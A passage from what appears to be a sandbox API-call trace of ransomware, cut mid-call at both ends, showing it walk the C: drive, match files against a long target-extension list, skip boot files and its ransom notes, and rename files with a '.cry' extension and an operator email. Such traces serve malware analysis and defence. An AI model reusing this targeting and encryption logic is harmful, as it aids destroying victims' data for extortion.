lpString2=".cry") returned 1 [0054.714] lstrlenW (lpString="EXP_XPS.DLL") returned 11 [0054.714] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_XPS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_xps.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0055.167] GetFileSizeEx (in: hFile=0x1c4, lpFileSize=0x329ff1c | out: lpFileSize=0x329ff1c*=71032) returned 1 [0055.167] CloseHandle (hObject=0x1c4) returned 1 [0055.167] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_XPS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_xps.dll")) returned 0x20 [0055.167] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_XPS.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_xps.dll.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0055.167] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_XPS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_xps.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0055.168] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.168] SetFilePointerEx (in: hFile=0x1c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x329fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.168] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\EXP_XPS.DLL.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\exp_xps.dll.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0056.000] GetLastError () returned 0x0 [0056.000] ReadFile (hFile=0x1c4, lpBuffer=0x3d90020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x329fed4, lpOverlapped=0x0) Thread: id = 18 os_tid = 0xa08 [0035.266] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x38e06c0 [0035.266] lstrlenW (lpString="C:") returned 2 [0035.266] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x33dfd00 | out: lpFindFileData=0x33dfd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x6f0fa8 [0035.267] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0035.267] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin") returned 1 [0035.267] lstrlenW (lpString="$Recycle.Bin") returned 12 [0035.267] lstrcmpiW (lpString1="C:\\Windows", lpString2="$Recycle.Bin") returned 1 [0035.267] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x38f06c8 [0035.267] lstrlenW (lpString="C:\\$Recycle.Bin") returned 15 [0035.267] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f0fe8 [0035.268] FindNextFileW (in: hFindFile=0x6f0fe8, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.268] FindNextFileW (in: hFindFile=0x6f0fe8, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0035.268] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0035.268] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 1 [0035.268] lstrlenW (lpString="S-1-5-21-3388679973-3930757225-3770151564-1000") returned 46 [0035.268] lstrcmpiW (lpString1="C:\\Windows", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000") returned -1 [0035.268] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x39006d0 [0035.268] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 62 [0035.268] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f2030 [0035.269] FindNextFileW (in: hFindFile=0x6f2030, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0035.269] FindNextFileW (in: hFindFile=0x6f2030, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0035.269] lstrlenW (lpString="desktop.ini") returned 11 [0035.269] lstrlenW (lpString=".1cd") returned 4 [0035.269] lstrcmpiW (lpString1=".1cd", lpString2=".ini") returned -1 [0035.269] lstrlenW (lpString=".3ds") returned 4 [0035.269] lstrcmpiW (lpString1=".3ds", lpString2=".ini") returned -1 [0035.269] lstrlenW (lpString=".3fr") returned 4 [0035.269] lstrcmpiW (lpString1=".3fr", lpString2=".ini") returned -1 [0035.269] lstrlenW (lpString=".3g2") returned 4 [0035.269] lstrcmpiW (lpString1=".3g2", lpString2=".ini") returned -1 [0035.269] lstrlenW (lpString=".3gp") returned 4 [0035.269] lstrcmpiW (lpString1=".3gp", lpString2=".ini") returned -1 [0035.269] lstrlenW (lpString=".7z") returned 3 [0035.269] lstrcmpiW (lpString1=".7z", lpString2="ini") returned -1 [0035.269] lstrlenW (lpString=".accda") returned 6 [0035.269] lstrcmpiW (lpString1=".accda", lpString2="op.ini") returned -1 [0035.269] lstrlenW (lpString=".accdb") returned 6 [0035.269] lstrcmpiW (lpString1=".accdb", lpString2="op.ini") returned -1 [0035.269] lstrlenW (lpString=".accdc") returned 6 [0035.269] lstrcmpiW (lpString1=".accdc", lpString2="op.ini") returned -1 [0035.269] lstrlenW (lpString=".accde") returned 6 [0035.269] lstrcmpiW (lpString1=".accde", lpString2="op.ini") returned -1 [0035.269] lstrlenW (lpString=".accdt") returned 6 [0035.270] lstrcmpiW (lpString1=".accdt", lpString2="op.ini") returned -1 [0035.270] lstrlenW (lpString=".accdw") returned 6 [0035.270] lstrcmpiW (lpString1=".accdw", lpString2="op.ini") returned -1 [0035.270] lstrlenW (lpString=".adb") returned 4 [0035.270] lstrcmpiW (lpString1=".adb", lpString2=".ini") returned -1 [0035.270] lstrlenW (lpString=".adp") returned 4 [0035.270] lstrcmpiW (lpString1=".adp", lpString2=".ini") returned -1 [0035.270] lstrlenW (lpString=".ai") returned 3 [0035.270] lstrcmpiW (lpString1=".ai", lpString2="ini") returned -1 [0035.270] lstrlenW (lpString=".ai3") returned 4 [0035.270] lstrcmpiW (lpString1=".ai3", lpString2=".ini") returned -1 [0035.270] lstrlenW (lpString=".ai4") returned 4 [0035.270] lstrcmpiW (lpString1=".ai4", lpString2=".ini") returned -1 [0035.270] lstrlenW (lpString=".ai5") returned 4 [0035.270] lstrcmpiW (lpString1=".ai5", lpString2=".ini") returned -1 [0035.270] lstrlenW (lpString=".ai6") returned 4 [0035.270] lstrcmpiW (lpString1=".ai6", lpString2=".ini") returned -1 [0035.270] lstrlenW (lpString=".ai7") returned 4 [0035.270] lstrcmpiW (lpString1=".ai7", lpString2=".ini") returned -1 [0035.270] lstrlenW (lpString=".ai8") returned 4 [0035.270] lstrcmpiW (lpString1=".ai8", lpString2=".ini") returned -1 [0035.270] lstrlenW (lpString=".anim") returned 5 [0035.270] lstrcmpiW (lpString1=".anim", lpString2="p.ini") returned -1 [0035.270] lstrlenW (lpString=".arw") returned 4 [0035.270] lstrcmpiW (lpString1=".arw", lpString2=".ini") returned -1 [0035.270] lstrlenW (lpString=".as") returned 3 [0035.270] lstrcmpiW (lpString1=".as", lpString2="ini") returned -1 [0035.270] lstrlenW (lpString=".asa") returned 4 [0035.270] lstrcmpiW (lpString1=".asa", lpString2=".ini") returned -1 [0035.271] lstrlenW (lpString=".asc") returned 4 [0035.271] lstrcmpiW (lpString1=".asc", lpString2=".ini") returned -1 [0035.271] lstrlenW (lpString=".ascx") returned 5 [0035.271] lstrcmpiW (lpString1=".ascx", lpString2="p.ini") returned -1 [0035.271] lstrlenW (lpString=".asm") returned 4 [0035.271] lstrcmpiW (lpString1=".asm", lpString2=".ini") returned -1 [0035.271] lstrlenW (lpString=".asmx") returned 5 [0035.271] lstrcmpiW (lpString1=".asmx", lpString2="p.ini") returned -1 [0035.271] lstrlenW (lpString=".asp") returned 4 [0035.271] lstrcmpiW (lpString1=".asp", lpString2=".ini") returned -1 [0035.271] lstrlenW (lpString=".aspx") returned 5 [0035.271] lstrcmpiW (lpString1=".aspx", lpString2="p.ini") returned -1 [0035.271] lstrlenW (lpString=".asr") returned 4 [0035.271] lstrcmpiW (lpString1=".asr", lpString2=".ini") returned -1 [0035.271] lstrlenW (lpString=".asx") returned 4 [0035.271] lstrcmpiW (lpString1=".asx", lpString2=".ini") returned -1 [0035.271] lstrlenW (lpString=".avi") returned 4 [0035.271] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0035.271] lstrlenW (lpString=".avs") returned 4 [0035.271] lstrcmpiW (lpString1=".avs", lpString2=".ini") returned -1 [0035.271] lstrlenW (lpString=".backup") returned 7 [0035.271] lstrcmpiW (lpString1=".backup", lpString2="top.ini") returned -1 [0035.271] lstrlenW (lpString=".bak") returned 4 [0035.271] lstrcmpiW (lpString1=".bak", lpString2=".ini") returned -1 [0035.271] lstrlenW (lpString=".bay") returned 4 [0035.271] lstrcmpiW (lpString1=".bay", lpString2=".ini") returned -1 [0035.271] lstrlenW (lpString=".bd") returned 3 [0035.271] lstrcmpiW (lpString1=".bd", lpString2="ini") returned -1 [0035.271] lstrlenW (lpString=".bin") returned 4 [0035.272] lstrcmpiW (lpString1=".bin", lpString2=".ini") returned -1 [0035.272] lstrlenW (lpString=".bmp") returned 4 [0035.272] lstrcmpiW (lpString1=".bmp", lpString2=".ini") returned -1 [0035.272] lstrlenW (lpString=".bz2") returned 4 [0035.272] lstrcmpiW (lpString1=".bz2", lpString2=".ini") returned -1 [0035.272] lstrlenW (lpString=".c") returned 2 [0035.272] lstrcmpiW (lpString1=".c", lpString2="ni") returned -1 [0035.272] lstrlenW (lpString=".cdr") returned 4 [0035.272] lstrcmpiW (lpString1=".cdr", lpString2=".ini") returned -1 [0035.272] lstrlenW (lpString=".cer") returned 4 [0035.272] lstrcmpiW (lpString1=".cer", lpString2=".ini") returned -1 [0035.272] lstrlenW (lpString=".cf") returned 3 [0035.272] lstrcmpiW (lpString1=".cf", lpString2="ini") returned -1 [0035.272] lstrlenW (lpString=".cfc") returned 4 [0035.272] lstrcmpiW (lpString1=".cfc", lpString2=".ini") returned -1 [0035.272] lstrlenW (lpString=".cfm") returned 4 [0035.272] lstrcmpiW (lpString1=".cfm", lpString2=".ini") returned -1 [0035.272] lstrlenW (lpString=".cfml") returned 5 [0035.272] lstrcmpiW (lpString1=".cfml", lpString2="p.ini") returned -1 [0035.272] lstrlenW (lpString=".cfu") returned 4 [0035.272] lstrcmpiW (lpString1=".cfu", lpString2=".ini") returned -1 [0035.272] lstrlenW (lpString=".chm") returned 4 [0035.272] lstrcmpiW (lpString1=".chm", lpString2=".ini") returned -1 [0035.272] lstrlenW (lpString=".cin") returned 4 [0035.272] lstrcmpiW (lpString1=".cin", lpString2=".ini") returned -1 [0035.272] lstrlenW (lpString=".class") returned 6 [0035.272] lstrcmpiW (lpString1=".class", lpString2="op.ini") returned -1 [0035.272] lstrlenW (lpString=".clx") returned 4 [0035.272] lstrcmpiW (lpString1=".clx", lpString2=".ini") returned -1 [0035.273] lstrlenW (lpString=".config") returned 7 [0035.273] lstrcmpiW (lpString1=".config", lpString2="top.ini") returned -1 [0035.273] lstrlenW (lpString=".cpp") returned 4 [0035.273] lstrcmpiW (lpString1=".cpp", lpString2=".ini") returned -1 [0035.273] lstrlenW (lpString=".cr2") returned 4 [0035.273] lstrcmpiW (lpString1=".cr2", lpString2=".ini") returned -1 [0035.273] lstrlenW (lpString=".crt") returned 4 [0035.273] lstrcmpiW (lpString1=".crt", lpString2=".ini") returned -1 [0035.273] lstrlenW (lpString=".crw") returned 4 [0035.273] lstrcmpiW (lpString1=".crw", lpString2=".ini") returned -1 [0035.273] lstrlenW (lpString=".cs") returned 3 [0035.273] lstrcmpiW (lpString1=".cs", lpString2="ini") returned -1 [0035.273] lstrlenW (lpString=".css") returned 4 [0035.273] lstrcmpiW (lpString1=".css", lpString2=".ini") returned -1 [0035.273] lstrlenW (lpString=".csv") returned 4 [0035.273] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1 [0035.273] lstrlenW (lpString=".cub") returned 4 [0035.273] lstrcmpiW (lpString1=".cub", lpString2=".ini") returned -1 [0035.273] lstrlenW (lpString=".dae") returned 4 [0035.273] lstrcmpiW (lpString1=".dae", lpString2=".ini") returned -1 [0035.273] lstrlenW (lpString=".dat") returned 4 [0035.273] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0035.273] lstrlenW (lpString=".db") returned 3 [0035.273] lstrcmpiW (lpString1=".db", lpString2="ini") returned -1 [0035.273] lstrlenW (lpString=".dbf") returned 4 [0035.273] lstrcmpiW (lpString1=".dbf", lpString2=".ini") returned -1 [0035.273] lstrlenW (lpString=".dbx") returned 4 [0035.273] lstrcmpiW (lpString1=".dbx", lpString2=".ini") returned -1 [0035.273] lstrlenW (lpString=".dc3") returned 4 [0035.273] lstrcmpiW (lpString1=".dc3", lpString2=".ini") returned -1 [0035.274] lstrlenW (lpString=".dcm") returned 4 [0035.274] lstrcmpiW (lpString1=".dcm", lpString2=".ini") returned -1 [0035.274] lstrlenW (lpString=".dcr") returned 4 [0035.274] lstrcmpiW (lpString1=".dcr", lpString2=".ini") returned -1 [0035.274] lstrlenW (lpString=".der") returned 4 [0035.274] lstrcmpiW (lpString1=".der", lpString2=".ini") returned -1 [0035.274] lstrlenW (lpString=".dib") returned 4 [0035.274] lstrcmpiW (lpString1=".dib", lpString2=".ini") returned -1 [0035.274] lstrlenW (lpString=".dic") returned 4 [0035.274] lstrcmpiW (lpString1=".dic", lpString2=".ini") returned -1 [0035.274] lstrlenW (lpString=".dif") returned 4 [0035.274] lstrcmpiW (lpString1=".dif", lpString2=".ini") returned -1 [0035.274] lstrlenW (lpString=".divx") returned 5 [0035.274] lstrcmpiW (lpString1=".divx", lpString2="p.ini") returned -1 [0035.274] lstrlenW (lpString=".djvu") returned 5 [0035.274] lstrcmpiW (lpString1=".djvu", lpString2="p.ini") returned -1 [0035.274] lstrlenW (lpString=".dng") returned 4 [0035.274] lstrcmpiW (lpString1=".dng", lpString2=".ini") returned -1 [0035.274] lstrlenW (lpString=".doc") returned 4 [0035.274] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0035.274] lstrlenW (lpString=".docm") returned 5 [0035.274] lstrcmpiW (lpString1=".docm", lpString2="p.ini") returned -1 [0035.274] lstrlenW (lpString=".docx") returned 5 [0035.274] lstrcmpiW (lpString1=".docx", lpString2="p.ini") returned -1 [0035.274] lstrlenW (lpString=".dot") returned 4 [0035.274] lstrcmpiW (lpString1=".dot", lpString2=".ini") returned -1 [0035.274] lstrlenW (lpString=".dotm") returned 5 [0035.274] lstrcmpiW (lpString1=".dotm", lpString2="p.ini") returned -1 [0035.274] lstrlenW (lpString=".dotx") returned 5 [0035.275] lstrcmpiW (lpString1=".dotx", lpString2="p.ini") returned -1 [0035.275] lstrlenW (lpString=".dpx") returned 4 [0035.275] lstrcmpiW (lpString1=".dpx", lpString2=".ini") returned -1 [0035.275] lstrlenW (lpString=".dqy") returned 4 [0035.275] lstrcmpiW (lpString1=".dqy", lpString2=".ini") returned -1 [0035.275] lstrlenW (lpString=".dsn") returned 4 [0035.275] lstrcmpiW (lpString1=".dsn", lpString2=".ini") returned -1 [0035.275] lstrlenW (lpString=".dt") returned 3 [0035.275] lstrcmpiW (lpString1=".dt", lpString2="ini") returned -1 [0035.275] lstrlenW (lpString=".dtd") returned 4 [0035.275] lstrcmpiW (lpString1=".dtd", lpString2=".ini") returned -1 [0035.275] lstrlenW (lpString=".dwg") returned 4 [0035.275] lstrcmpiW (lpString1=".dwg", lpString2=".ini") returned -1 [0035.275] lstrlenW (lpString=".dwt") returned 4 [0035.275] lstrcmpiW (lpString1=".dwt", lpString2=".ini") returned -1 [0035.275] lstrlenW (lpString=".dx") returned 3 [0035.275] lstrcmpiW (lpString1=".dx", lpString2="ini") returned -1 [0035.275] lstrlenW (lpString=".dxf") returned 4 [0035.275] lstrcmpiW (lpString1=".dxf", lpString2=".ini") returned -1 [0035.275] lstrlenW (lpString=".edml") returned 5 [0035.275] lstrcmpiW (lpString1=".edml", lpString2="p.ini") returned -1 [0035.275] lstrlenW (lpString=".efd") returned 4 [0035.275] lstrcmpiW (lpString1=".efd", lpString2=".ini") returned -1 [0035.275] lstrlenW (lpString=".elf") returned 4 [0035.275] lstrcmpiW (lpString1=".elf", lpString2=".ini") returned -1 [0035.275] lstrlenW (lpString=".emf") returned 4 [0035.275] lstrcmpiW (lpString1=".emf", lpString2=".ini") returned -1 [0035.275] lstrlenW (lpString=".emz") returned 4 [0035.275] lstrcmpiW (lpString1=".emz", lpString2=".ini") returned -1 [0035.275] lstrlenW (lpString=".epf") returned 4 [0035.275] lstrcmpiW (lpString1=".epf", lpString2=".ini") returned -1 [0035.275] lstrlenW (lpString=".eps") returned 4 [0035.276] lstrcmpiW (lpString1=".eps", lpString2=".ini") returned -1 [0035.276] lstrlenW (lpString=".epsf") returned 5 [0035.276] lstrcmpiW (lpString1=".epsf", lpString2="p.ini") returned -1 [0035.276] lstrlenW (lpString=".epsp") returned 5 [0035.276] lstrcmpiW (lpString1=".epsp", lpString2="p.ini") returned -1 [0035.276] lstrlenW (lpString=".erf") returned 4 [0035.276] lstrcmpiW (lpString1=".erf", lpString2=".ini") returned -1 [0035.276] lstrlenW (lpString=".exr") returned 4 [0035.276] lstrcmpiW (lpString1=".exr", lpString2=".ini") returned -1 [0035.276] lstrlenW (lpString=".f4v") returned 4 [0035.276] lstrcmpiW (lpString1=".f4v", lpString2=".ini") returned -1 [0035.276] lstrlenW (lpString=".fido") returned 5 [0035.276] lstrcmpiW (lpString1=".fido", lpString2="p.ini") returned -1 [0035.276] lstrlenW (lpString=".flm") returned 4 [0035.276] lstrcmpiW (lpString1=".flm", lpString2=".ini") returned -1 [0035.276] lstrlenW (lpString=".flv") returned 4 [0035.276] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0035.276] lstrlenW (lpString=".frm") returned 4 [0035.276] lstrcmpiW (lpString1=".frm", lpString2=".ini") returned -1 [0035.276] lstrlenW (lpString=".fxg") returned 4 [0035.276] lstrcmpiW (lpString1=".fxg", lpString2=".ini") returned -1 [0035.276] lstrlenW (lpString=".geo") returned 4 [0035.276] lstrcmpiW (lpString1=".geo", lpString2=".ini") returned -1 [0035.276] lstrlenW (lpString=".gif") returned 4 [0035.276] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0035.276] lstrlenW (lpString=".grs") returned 4 [0035.276] lstrcmpiW (lpString1=".grs", lpString2=".ini") returned -1 [0035.276] lstrlenW (lpString=".gz") returned 3 [0035.276] lstrcmpiW (lpString1=".gz", lpString2="ini") returned -1 [0035.276] lstrlenW (lpString=".h") returned 2 [0035.276] lstrcmpiW (lpString1=".h", lpString2="ni") returned -1 [0035.276] lstrlenW (lpString=".hdr") returned 4 [0035.276] lstrcmpiW (lpString1=".hdr", lpString2=".ini") returned -1 [0035.276] lstrlenW (lpString=".hpp") returned 4 [0035.276] lstrcmpiW (lpString1=".hpp", lpString2=".ini") returned -1 [0035.276] lstrlenW (lpString=".hta") returned 4 [0035.276] lstrcmpiW (lpString1=".hta", lpString2=".ini") returned -1 [0035.276] lstrlenW (lpString=".htc") returned 4 [0035.276] lstrcmpiW (lpString1=".htc", lpString2=".ini") returned -1 [0035.276] lstrlenW (lpString=".htm") returned 4 [0035.276] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0035.277] lstrlenW (lpString=".html") returned 5 [0035.277] lstrcmpiW (lpString1=".html", lpString2="p.ini") returned -1 [0035.277] lstrlenW (lpString=".icb") returned 4 [0035.277] lstrcmpiW (lpString1=".icb", lpString2=".ini") returned -1 [0035.277] lstrlenW (lpString=".ics") returned 4 [0035.277] lstrcmpiW (lpString1=".ics", lpString2=".ini") returned -1 [0035.277] lstrlenW (lpString=".iff") returned 4 [0035.277] lstrcmpiW (lpString1=".iff", lpString2=".ini") returned -1 [0035.277] lstrlenW (lpString=".inc") returned 4 [0035.277] lstrcmpiW (lpString1=".inc", lpString2=".ini") returned -1 [0035.277] lstrlenW (lpString=".indd") returned 5 [0035.277] lstrcmpiW (lpString1=".indd", lpString2="p.ini") returned -1 [0035.277] lstrlenW (lpString=".ini") returned 4 [0035.277] lstrcmpiW (lpString1=".ini", lpString2=".ini") returned 0 [0035.277] lstrlenW (lpString="desktop.ini") returned 11 [0035.277] lstrlenW (lpString=".cry") returned 4 [0035.277] lstrcmpiW (lpString1=".cry", lpString2=".ini") returned -1 [0035.277] lstrlenW (lpString="desktop.ini") returned 11 [0035.277] lstrcmpiW (lpString1="boot.ini", lpString2="desktop.ini") returned -1 [0035.277] lstrcmpiW (lpString1="bootfont.bin", lpString2="desktop.ini") returned -1 [0035.277] lstrcmpiW (lpString1="ntldr", lpString2="desktop.ini") returned 1 [0035.277] lstrcmpiW (lpString1="ntdetect.com", lpString2="desktop.ini") returned 1 [0035.277] lstrcmpiW (lpString1="io.sys", lpString2="desktop.ini") returned 1 [0035.277] lstrcmpiW (lpString1="RETURN FILES.txt", lpString2="desktop.ini") returned 1 [0035.277] lstrcmpiW (lpString1="Info.hta", lpString2="desktop.ini") returned 1 [0035.277] lstrcmpiW (lpString1="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe", lpString2="desktop.ini") returned -1 [0035.277] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 74 [0035.277] FindNextFileW (in: hFindFile=0x6f2030, lpFindFileData=0x33df808 | out: lpFindFileData=0x33df808*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0035.277] FindClose (in: hFindFile=0x6f2030 | out: hFindFile=0x6f2030) returned 1 [0035.277] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x39006d0 | out: hHeap=0x600000) returned 1 [0035.277] FindNextFileW (in: hFindFile=0x6f0fe8, lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0035.277] FindClose (in: hFindFile=0x6f0fe8 | out: hFindFile=0x6f0fe8) returned 1 [0035.278] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x38f06c8 | out: hHeap=0x600000) returned 1 [0035.278] FindNextFileW (in: hFindFile=0x6f0fa8, lpFindFileData=0x33dfd00 | out: lpFindFileData=0x33dfd00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0035.278] lstrlenW (lpString="C:\\Boot") returned 7 [0035.278] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Boot") returned 1 [0035.278] lstrlenW (lpString="Boot") returned 4 [0035.278] lstrcmpiW (lpString1="C:\\Windows", lpString2="Boot") returned 1 [0035.278] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0xfffe) returned 0x38f06c8 [0035.278] lstrlenW (lpString="C:\\Boot") returned 7 [0035.278] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x33dfa84 | out: lpFindFileData=0x33dfa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6f1ff0 [0035.278] FindNextFileW 